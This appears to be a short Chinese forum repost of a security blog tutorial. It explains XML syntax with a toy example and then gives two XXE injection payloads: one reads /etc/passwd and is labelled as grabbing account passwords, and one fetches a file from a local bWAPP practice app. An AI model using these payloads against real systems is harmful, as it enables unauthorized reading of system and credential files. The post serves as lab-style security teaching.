Ken1Ve 发布于2022年11月4日 分享 发布于2022年11月4日 XML 被设计用来传输和存储数据。语法规则<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明--> <girl age="18"> <!--自定的根元素girl;age属性需要加引导--> <hair>长头发</hair> <!--自定义的4个子元素,即girl对象的属性--> <eye>大眼睛</eye> <face>可爱的脸庞</face> <summary>可爱美丽的女孩</summary> </girl> <!--根元素的闭合-->Payload获取账户密码:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xxe>&xxe;</xxe>读取网站任意文件:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt"> ]> <reset><login>&xxe;</login><secret>Any bugs?</secret></reset> 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/610.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。 链接帖子 意见的链接 分享到其他网站 更多分享选项…
推荐的帖子